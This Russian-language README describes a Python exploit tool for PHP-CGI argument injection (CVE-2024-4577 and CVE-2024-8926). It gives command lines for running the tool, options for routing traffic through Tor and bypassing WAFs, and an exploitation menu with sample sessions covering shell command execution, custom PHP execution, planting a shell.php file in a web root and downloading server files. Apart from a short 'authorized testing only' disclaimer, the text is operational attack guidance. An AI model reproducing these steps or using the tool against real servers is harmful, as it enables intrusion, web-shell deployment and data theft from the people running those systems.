Инструмент для тестирования безопасности CVE-2024-4577 и CVE-2024-8926
🚀 CVE-2024-4577 и CVE-2024-8926 Эксплойт-инструмент
Автоматизированный инструмент для тестирования уязвимости внедрения параметров PHP-CGI, поддерживающий CVE-2024-4577 и CVE-2024-8926, позволяющий выполнять команды, загружать и скачивать файлы.
Данный инструмент предназначен для тестирования уязвимости внедрения параметров в среде PHP-CGI и предоставляет:
Данный инструмент предназначен исключительно для легального тестирования и академических целей. Не используйте его на системах без авторизации!
⚠️ Незаконное использование влечёт за собой юридическую ответственность!
Инструмент разрешён только для:
Инструмент требует следующие пакеты Python. Установите их:
pip install -r requirements.txt
Или вручную:
pip install requests requests-tor chardet urllib3 rich
python exploit.py -u URL [--timeout sec] [--delay sec] [--log] [--verbose] [--payload PAYLOAD] [--bypass] [--tor] [--no-effects] [--force] [--cgipoint PATHS...]
Примеры:
python exploit.py -u http://example.com --timeout 30 --payload 2 --log --tor --verbose
python exploit.py -u http://example.com --bypass --force
python exploit.py -u http://example.com --cgipoint /php-cgi/php-cgi.exe /cgi-bin/php
| Параметр | Описание | Пример |
|---|---|---|
-u , --url | Целевой URL | -u http://example.com |
--timeout sec | Тайм-аут запроса (0 — бесконечно) | --timeout 30 |
--log | Автоматическая запись команд в shell | --log |
--payload | Выбор или собственный набор Payload | --payload 2 |
--tor | Отправка запросов через Tor | --tor |
--verbose | Подробный вывод | --verbose |
--bypass | Включить режим обхода WAF | --bypass |
--force | Принудительный вход в режим эксплуатации | --force |
--cgipoint PATHS | Указать конкретные пути CGI для тестирования | --cgipoint /path |
--delay sec | Задержка между запросами (в секундах) | --delay 1.5 |
--no-effects | Отключить анимацию и задержки | --no-effects |
После обнаружения уязвимости отобразится меню:
╭──────────── Меню режима эксплуатации ────────────╮
│ Текущая цель: http://example.com/ │
│ Текущая точка внедрения: /php-cgi/php-cgi.exe │
│ Идентификатор уязвимости: CVE-2024-4577 │
╰────────────────────────────────────────────────────╯
1) 🧪 Режим Shell
2) 🛠️ Режим пользовательского PHP
3) 📤 Загрузить файл
4) 📥 Скачать файл
5) 🎯 Сменить цель атаки
6) ⚙️ Настройки параметров
7) ❌ Выход из программы
>>
Выполнение системных команд:
shell> whoami
📂 Сохранение вывода
shell> whoami --save
shell> whoami --save C:\output\whoami.txt
Выполнение пользовательского PHP-кода:
phpinfo();
EOF
📂 Сохранение вывода
phpinfo();
EOF --save
phpinfo();
EOF --save C:\output\info.html
Путь к локальному файлу: C:\test\shell.php
Полный путь на сервере:
[*] Автоматически установлен путь загрузки: C:/xampp/htdocs/shell.php
📂 Указание пути вручную
Полный путь на сервере: C:\xampp\php\shell.php
Путь к удалённому файлу: C:\xampp\htdocs\index.php
📂 Файл сохраняется в download/, при повторении имени автоматически добавляется номер
[*] Файл скачан, сохранён в download/index.php
Введите новый целевой URL: http://newtarget.com
🔹 Уязвимость будет протестирована заново
[⚙️ Меню настройки параметров этапа эксплуатации]
1) Сменить Payload 1
2) Модуль обхода Bypass не выбран
3) Тайм-аут ожидания Timeout 10 с
4) Задержка запросов Delay 0 с
5) Автозапись Log выкл
6) Подробный режим Verbose выкл
7) Эффекты Effects вкл
8) Принудительное использование Force выкл
9) Сохранить и вернуться в меню Exploit
Предоставляются следующие стратегии обхода:
php://input на другие варианты